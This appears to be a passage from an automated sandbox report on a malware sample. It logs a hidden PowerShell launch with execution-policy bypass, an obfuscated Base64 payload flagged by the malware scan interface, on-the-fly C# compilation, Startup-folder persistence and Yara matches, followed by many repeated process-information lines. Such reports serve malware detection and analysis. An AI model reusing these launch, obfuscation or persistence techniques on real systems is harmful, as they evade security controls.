                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb? source: powershell.exe, 00000005.00000002.2349927128.0000029DF3DFE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Managem..Automation.pdb source: powershell.exe, 00000005.00000002.2351616241.0000029DF4150000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($gG5BB6nIWq04P4lUnWY3VOJjV3A5CYmVg9cnPFtGjiGhxkVpeQbrYT3S7VpH6rG7EfYQc8EinRTxHlvvhVav746MFKq4ZlK2cJcSMFMgM2EGAGKVj4kkRU9JiLKRRKJBGbV8IdicI3jF0zM9AUUeBkkHJTtA55OCsCAivLMGWIbXu4Ts9KR6zp
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.cmdline"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.cmdline"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD345700BD pushad ; iretd 0_2_00007FFD345700C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3456B500 push ebx; retf 5_2_00007FFD3456B51A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345400BD pushad ; iretd 5_2_00007FFD345400C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34548167 push ebx; ret 5_2_00007FFD3454816A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34545278 push eax; ret 5_2_00007FFD34545439
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD346115A2 push E85F9476h; ret 5_2_00007FFD346115A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0645B5A1 push es; ret 9_2_0645B5B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06453241 push es; ret 9_2_06453250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06453261 push es; ret 9_2_06453230
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06453261 push es; ret 9_2_06453270
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_064532C0 push es; ret 9_2_064532D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_064532E1 push es; ret 9_2_064532F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06453281 push es; ret 9_2_06453290
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_064532A0 push es; ret 9_2_064532B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_064532A0 push es; ret 9_2_06453310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06453321 push es; ret 9_2_06453330
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06458001 push es; ret 9_2_06458180
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_064531C0 push es; ret 9_2_06453230
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_064531A0 push es; ret 9_2_06453230
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06452AB1 push es; ret 9_2_06452AC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06D65B50 push esp; iretd 9_2_06D65BCD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06D61E30 push es; ret 9_2_06D61E40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06D64571 push es; ret 9_2_06D64580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06D62110 push es; retn 0010h9_2_06D62162
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.dllJump to dropped file

                  Boot Survival

                  barindex
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4508, type: MEMORYSTR
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\App.urlJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\App.urlJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
